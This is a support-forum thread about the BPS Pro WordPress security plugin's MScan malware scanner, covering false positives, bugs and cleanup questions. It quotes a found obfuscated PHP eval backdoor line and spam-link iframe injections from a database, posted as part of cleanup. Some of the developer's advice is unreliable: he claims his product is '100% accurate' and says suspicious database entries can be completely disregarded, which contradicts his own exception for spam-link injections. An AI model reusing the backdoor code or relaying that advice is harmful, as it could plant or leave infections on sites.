MScan – Troubleshooting, questions, problems and code posting

[Living Miracles]

Hello,

I just wanted to write a reply now to see if there is any ETA update on the release of BPS Pro version 15.3, which includes the new MScan rebuild.

Thank you and looking forward to your response.

[AITpro Admin]

Things have changed drastically.  The MScan rebuild has been pulled out of BPS Pro 15.3 (currently 80% completed) due to unforeseen problems and life in general.  😉  In order to get important updates out in BPS Pro 15.3 quicker I am pulling the MScan rebuild from 15.3.  The MScan rebuild will be available in BPS Pro 15.4 – No ETA is available for the BPS Pro 15.4 release.

[AITpro Admin]

So just don’t use MScan until it is rebuilt.  Currently MScan is not user friendly or very accurate, which is pretty common with most conventional website malware scanners.  BPS Pro AutoRestore|Quarantine is 100% accurate and is far superior to any/all website malware scanners.  So continue to rely on BPS Pro ARQ IDPS.

[Living Miracles]

Okay, I see. Well, thank you for the update and for letting us know about that. We’re looking forward to using this newly rebuilt MScan and will await version 15.4 for it.

[Living Miracles]

Hello,

I’ve been getting into testing out MScan on some of our sites lately and loving this powerful malware scanner. I’ve also read all the documentation I could find on it. That being said, from my testing thus far, I have the following questions and notes I want to post here:

• Should the BPS Pro plugin be getting checked by MScan as well or is this somehow covered? I tried uploading a .zip copy of this premium plugin through the “Upload Plugin Zip Files” button, but it doesn’t seem to work each time after I run the MScan as the BPS Pro files don’t get added to the “plugin-hashes.php” file and it just unzips the “bulletproof-security” plugin folder and exports its files and folders within it and keeps the .zip file there as well. Here is a screenshot of what I’m seeing when I try this.
  • On the “MScan Report” page, within the “WP Core|Plugin|Theme File Hashes” area, it says “No File Hashes for This Plugin” for the “bulletproof-security Plugin Hash File Version” row. Then, on the “MScan Log” page, it mentions this in the log: Plugin Zip File Download: WP_Error: Unable to download Plugin zip file: bulletproof-security.15.5.zip from WordPress.org. So these couple of things also make it seem like we should be uploading this plugin .zip file and MScan should be checking this plugin.
• We have many WordPress sites (40+) and many of them use premium plugins and/or themes. From what I’ve read, MScan will not be able to automatically retrieve these plugins or themes, or even plugins that don’t have their version number in the .zip file name, to create hashes for them. In this case, can you confirm that whenever one of these plugins or themes gets updated that I would need to manually re-upload the updated .zip file for it through the BPS Pro plugin on each associated website in order for MScan to work correctly in scanning/checking these plugins or themes on it moving forward?
  • Also, we have a child theme folder on each website. Can you confirm that any time we change a file in the child theme folder we would need to re-upload a fresh .zip file for this through the BPS Pro plugin for MScan to work correctly in scanning/checking that folder moving forward?
• On the sites I’ve tested so far, MScan did catch some suspicious files and database entries. I’m new to this, so I thought I would briefly share how I’m checking them in general and see if this is what you would do or if there are some tips that you could share in determining if something is truly malicious or not:
  • For files, I would briefly review the code and see if anything seems obviously strange or not. If I wasn’t 100% confident, I would then upload the file to VirusTotal and see if any of the results from that mark the file as malicious.
    • For example, one file MScan caught was a favicon.ico file in /wp-content/uploads/ due to a pattern match of \2n5. I viewed the image and it seems to be something that we could be using on the site, and I uploaded it to VirusTotal and nothing there detected something malicious. Am I potentially missing something here? Is it actually possible for a favicon.ico file, or any other image file, to contain malicious code?
  • For database entries, it has been “<iframe”, “<noscript”, and “<script” code that has got caught so far. I would briefly review the contents of the code between the opening and closing of those tags each time to see if I recognized something or the domain within it and see if it makes sense with the site I found this on. For this, however, I don’t really have a secondary tool I can use to help check these entries but I believe it has felt obvious enough so far.
    • For example, on one site, where we had many Vimeo and YouTube videos embedded on it, I decided to just skip and ignore all the database entries without that had Vimeo and YouTube embed links in them without reviewing each one. This was to speed up the process since over 1,600 suspicious entries were caught and I didn’t think there could be a hack that would occur from a Vimeo or YouTube video embed code/link. That being said, please let me know if my thinking here was incorrect.
• Is it normal behavior that at least on one site, the very last row for a scan, as seen in the MScan Log page, showed a suspicious database entry but this entry didn’t show up in the “View|Ignore Suspicious DB Entries” section on the “MScan 2.0” page? The following is the row I saw in the MScan Log:

  • Scanning Database: DB Table: xxx_relevanssi_log | Column|Field: query | Primary Key ID: 
    
    Scanning Database: Code Pattern Match: eval( or (lave
    
    Scanning Database: Database scan completed.

  • I’m not sure if this is malicious or an issue or not since it was found in a database table for a plugin log, but the following was what I found in the database entry when I browsed it:

    • eval(urldecode(urldecode($_post[chr(99).chr(111).chr(100).chr(101).chr(122)])));

• I’ve been testing out the “Scheduled Scan Frequency” option and I tried all the different options on a couple of sites but there appears to be a glitch/issue with these options as the automatic scan is running every 15–20 minutes, or sometimes in even more frequent intervals, instead of the option I picked. Is this issue only on our end? For our setup, along with us already using ARQ IDPS, it feels very important for us to have this working correctly and be scheduled across all of our sites.
• Is it normal behavior that after I’ve done a scan, and I then remove some suspicious database entries via phpMyAdmin, that when I do another scan after that the results on the “View|Ignore Suspicious DB Entries” section or “MScan Report” page still show those database entries I’ve removed? I would expect that running another scan after I’ve removed certain entries from the database would make it so that those entries would not show up again. If this is the intended behavior for some reason, is the only way for those results to not show up anymore to use the “Reset MScan” button and to then run a scan after that?
• I’ve been noticing that even after clicking the “Delete File Hashes Tool” and “Reset Mscan” buttons, I’m still experiencing this same issue where it’s still mentioning “File Hash: Altered or unknown Plugin file” for certain plugin files under the “File Hash or Pattern Match” column in the “View|Ignore|Delete Suspicious Files” section. But I have even manually downloaded a fresh copy of the plugin from the WordPress directory and those certain plugin files are there and they’re identical in their contents as what I have on the site. What could be causing this? Is this a bug with MScan?
• In the BPS Pro PHP Error Log on our sites, I’ve been noticing various continuous PHP Warnings related to MScan. Are any of these something that should be fixed in the plugin? The following are the various PHP Warnings I’m seeing:

  • PHP Warning: Invalid argument supplied for foreach() in /xxxx/xxxx/xxxx/example.com/public_html/wp-content/plugins/bulletproof-security/includes/mscan-theme-hash-maker.php on line 571
    
    PHP Warning: Invalid argument supplied for foreach() in /xxxx/xxxx/xxxx/example.com/public_html/wp-content/plugins/bulletproof-security/admin/mscan/mscan.php on line 2578
    
    PHP Warning: Invalid argument supplied for foreach() in /xxxx/xxxx/xxxx/example.com/public_html/wp-content/plugins/bulletproof-security/includes/mscan-theme-hash-maker.php on line 224
    
    PHP Warning: array_diff_key(): Expected parameter 2 to be an array, null given in /xxxx/xxxx/xxxx/example.com/public_html/wp-content/plugins/bulletproof-security/includes/mscan-theme-hash-maker.php on line 236
    
    PHP Warning: array_merge(): Expected parameter 2 to be an array, null given in /xxxx/xxxx/xxxx/example.com/public_html/wp-content/plugins/bulletproof-security/includes/mscan-theme-hash-maker.php on line 237
    
    PHP Warning: A non-numeric value encountered in /xxxx/xxxx/xxxx/example.com/public_html/wp-content/plugins/bulletproof-security/includes/mscan-ajax-functions.php on line 2064

Please let me know if you need any more information on any of these bullet points.

Thank you for your time and support,
Nicolas from Living Miracles

[AITpro Admin]

Since you have BPS Pro then you don’t need to use MScan.  MScan is just a malware scanner.  All website malware scanners are pretty much worthless besides being a basic tool to confirm that your website/hosting account is hacked.  For BPS free users who want to check if their website/hosting account is already hacked they can use MScan.  BPS Pro comes with AutoRestore|Quarantine IDPS, which is far superior to MScan and any/all other website malware scanners.

[Living Miracles]

Thanks for your response.

We appreciate your great confidence in ARQ IDPS and we think it’s an amazing security tool as well. That being said, it would be very much appreciated if you could respond to the various questions and notes I had posted. If perhaps there are too many points to respond to within a forum, then I could send these questions to you via email if that works better for you to be able to respond to all of them. Just let me know.

To us, MScan seems to be a very helpful and possibly essential secondary security tool/scanner for our sites. One of the vulnerabilities with ARQ IDPS that we’ve become aware of is human error. For example, in the past, we mistakenly restored an uploaded file that ARQ caught since we weren’t sure whether it was a safe file or not, and even our hosting provider thought it was fine. It turns out that the file ended up being a malicious/hacker file which we later had to do a bigger clean-up for as a result. We are not security experts, so we aren’t always sure whether a new file or file modification that’s caught by ARQ is safe or malicious. We aren’t always sure we’ll recognize malicious/hacker code. With scheduled MScan running on our sites as a second line of defense, we feel that it could only help us in catching a mistake like this or other potential human errors sooner.

The other vulnerability is that I read that you previously wrote somewhere in this forum that if a site was already hacked in some way before BPS Pro was set up and being used on the site, then ARQ isn’t guaranteed to function properly or catch other malicious files that are created or uploaded on the site after that. You wrote that once a hacker has a foothold on a site, they can mess with the functionalities of BPS Pro/ARQ. From what I can tell, I don’t think a bigger hack has or is occurring on one of our sites, but when I tested running MScan on it, here are a few of the suspicious database entries it caught:

(64328, 7820, '_oembed_b7679cf6021238df9e9dceb7b36934a8', '<iframe width=\"1165\" height=\"655\" src=\"https://www.youtube.com/embed/nzVLUElQ0Ho?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(64330, 7820, '_oembed_0b6c969ca65dbbc9409f53498bd8514e', '
a href="http://www.menacure.com/import/vzjat-zajm-s-neobhodimoj-summoj-na-sajte/">Взять займ с необходимой суммой на сайте onlinekredit24 a
<iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" src=\"http://www.menacure.com/import/vzjat-zajm-s-neobhodimoj-summoj-na-sajte/embed/#?secret=qYrdLgcJqe\" data-secret=\"qYrdLgcJqe\" width=\"600\" height=\"338\" title=\"“Взять займ с необходимой суммой на сайте onlinekredit24” — \" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>'), (64333, 7820, '_oembed_eb1dbdfe47c6bbce582d33e0520ef347', '<iframe title=\"Как правильно загорать на солнце. 5 фактов о загаре. Советы врача\" width=\"1165\" height=\"655\" src=\"https://www.youtube.com/embed/O46jcc0zZWg?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),

I’m glad MScan caught this as we had no idea this was in our site’s database. I’ve gone ahead and removed these entries from our database. We’re not entirely sure if BPS Pro was already installed and set up on this site or not when these entries got into our database. So again, this is where we feel that a scheduled MScan running on our sites would only help in catching things like this on our site sooner or even at all.

Thank you for your time and looking forward to your responses.

[AITpro Admin]

The myth is that website malware scanners are some sort of essential website security protection, which of course is false.  Computer malware and anti-virus scanners/apps are actually effective and essential.  Those are 2 completely different technologies.  BPS Pro AutoRestore|Quarantine IDPS is modeled after computer malware scanners instead of conventional website malware scanners.  That is why ARQ IDPS is 100% accurate and 100% effective vs conventional website malware scanners that are 80% effective at best.  I created ARQ IDPS 10 years ago.  MScan was created many years later in BPS Pro.  So yeah website malware scanners are simply a tool to be used occasionally to check a website to see if it is infected.  Website malware scanners are “after the fact” vs ARQ IDPS, which is an Intrusion Detection and Prevention System.  Or in other words, ARQ IDPS offers real time protection that detects and stops/prevents the infection at the moment it occurs.

I don’t recommend that you schedule MScan scans.  I do recommend that you occasionally run an MScan scan – something like once every month.

In my professional experience with cleaning up 100’s of hacked websites/hosting accounts a website/hosting account has been hacked for months to years before a website owner becomes aware of the hack.  I have seen hacked websites/hosting accounts that have been hacked for up to 7 years without the website owner being aware of the hack.

I will answer any questions that are relevant in your previous forum post.  The problem is that website scanners have been promoted as something that is an effective website security measure when in fact website malware scanners are simply a basic tool to confirm or eliminate that a website/hosting account is hacked.  A lot of plugins claim their website malware scanner can automatically clean up a hacked website/hosting account.  That is false.  The only way to clean up a hacked website/hosting account is to do the clean up manually > https://forum.ait-pro.com/forums/topic/wordpress-hacked-wordpress-hack-cleanup-wordpress-hack-repair/ , which is a very quick and simple thing to do.

[AITpro Admin]

@ Living Miracles – Regarding your previous forum questions.  I’m not going to go into too much detail.  I’ve said this a few times now and will reiterate it again – MScan is just a malware scanner, which is a basic tool to confirm or eliminate that your website/hosting account is currently hacked or to check if there are left over hacks somewhere (files, code or in your DB) from a previous hack that could have occurred many years ago.

It is not important to scan the BPS Pro plugin or any other premium/paid plugins or themes.  I included that capability, but it is not essential in my opinion.

Unfortunately, MScan and all other website malware scanners will detect false positives.  That is a common limitation of website malware scanners.  ARQ IDPS on the other hand does not detect false positives and is always 100% accurate. There is no way to instantly teach someone what is legitimate code vs malicious code.  There is also no way to accurately automate that.  Website malware scanners are very limited/crude vs ARQ IDPS.  A general rule is that if you do not recognize something as something that you created then most likely it is malicious and should be deleted.  You would of course want to back up your website files and/or database before deleting anything.

Yes, the chr code you posted is malicious.  It is part of a COOKIE injection hack.  You can use this decoder to view the decoded code > https://malwaredecoder.com/. This is important to point out > left over database hacker code will NOT work if the required hacker files have already been deleted. Or in other words, all hacker database code requires counterpart hacker files in order to work. So you would just delete any left over DB hacker code for good measure. There is one exception to DB hacker code requiring a file counterpart in order to work and that is a Spam Link Injection hack, which was a security flaw/vulnerability in old versions of WordPress and some plugins and themes. Spam Link Injections work independently and need to removed ASAP.

I will look into the Scheduled Scan Frequency option to see if there are any bugs.

If you are still seeing old scan results then you have not clicked the Reset MScan button to clear old scan results.

You do NOT want to click the Delete File Hashes Tool button unless there is a major problem occurring.  Please read the MScan Read Me help button info.

Yes, you are going to see incorrect “File Hash: Altered or unknown Plugin file” scan results.  Unfortunately, that is another limitation of all malware scanners.  The thing to keep in mind is all malware scanners are simple basic tools that check files against matching patterns or hashes.  There are numerous complications with that and 99% of them are caused by issues directly related to a plugin or theme.  There are also numerous and various other complications and problems that I will not go into.  Once again all malware scanners are simple and basic tools to generally scan files and a database for “possible” malicious things.  All malware scanners cannot achieve 100% accuracy like ARQ IDPS can due to the inherent limitations of conventional website malware scanners.

I will look into the PHP errors.

[Living Miracles]

Thank you for taking the time to share all of that information and context, and for answering our current questions, as well as for looking into the potential issues/bugs with MScan that I’ve pointed out. That’s all helpful and much appreciated.

We’ll continue on with running MScan on more of our sites to see if any of them have any hacker files or code that we weren’t previously aware of.

[beatty2020]

A client’s site MScan just displayed some File Hashes and dozens of Pattern matching suspicions.

Same for suspicious DB Entries.

Client would like me to just go in and delete everything right away or else make a new website and import xml files of the pages and posts.

I think it’s faster to go through each suspicious file/db and deal than all that.

Can you suggest the best plan of action with some verbiage I can give to her to calm her down? We have already updated logins for everything on the site, the emails, the hosting, the cloudflare plan, the ftp, everything.

Thanks.

[AITpro Admin]

MScan pattern matching is not very accurate and can only generally detect possible hacker code in files.  File Hash checking is very accurate, but I see more and more plugins automatically updating files, which changes the files from what they were when they were originally installed.  What you want you want to do is check the files that were flagged as suspicious.  If there is not any hacker code in them then it was just a false positive result.

You can tell the person that MScan scans for suspicious files.  Suspicious files should then be checked to see if they are actually infected/malicious.

You can completely disregard any suspicious DB entries. Hacker code in a database only works if there are hacker files that go with that hacker code in the DB. Or in other words, hacker code in a DB is completely harmless if its counterpart files do not exist.

[beatty2020]

OK great about the db needing the files to become malicious.

So most of the files that were flagged came from Wordfence and WP Rocket. I’ve uninstalled Wordfence even though I like the notifications that a plugin or theme has been abandoned. Just not worth it for this site.

But when I went via ftp to view the files listed in /wp-content/cache/wp-rocket there are only 2 files there:

• index.html
• and an .htaccess file.

the htaccess file shows only this:

<IfModule mod_autoindex.c>
Options -Indexes
</IfModule>

The index.html is blank.

But the files that are marked by BPS pro are a variety of cached blog posts with variations of this:

/cache/wp-rocket/www.mysamplewebsite.com/title-of-blog-post/index-https.html

Disregard all of these non-existent files??

[AITpro Admin]

Click the Reset MScan button.  Add an Exclude Individual Folders rule >  /wp-content/cache/ and click the Save Options button.  Then run another scan.

[beatty2020]

Hopefully one last question on this: after adding the cache folder to “Exclude Individual Folders” rule, and hitting the Reset MScan button, I rescanned and got this as a suspicious file: /public_html/wp-includes/.htaccess

Seems to have no weird characters. Can you please confirm that this is another file to ignore/exclude?

# SGS Directory Hardening
<FilesMatch "\.(?i:php)$">
  <IfModule !mod_authz_core.c>
    Order allow,deny
    Deny from all
  </IfModule>
  <IfModule mod_authz_core.c>
    Require all denied
  </IfModule>
</FilesMatch>
<Files wp-tinymce.php>
	<IfModule !mod_authz_core.c>
		Allow from all
	</IfModule>
	<IfModule mod_authz_core.c>
		Require all granted
	</IfModule>
</Files>
<Files ms-files.php>
	<IfModule !mod_authz_core.c>
		Allow from all
	</IfModule>
	<IfModule mod_authz_core.c>
		Require all granted
	</IfModule>
</Files>

# SGS Directory Hardening END

Thanks again.

[Author]

Posts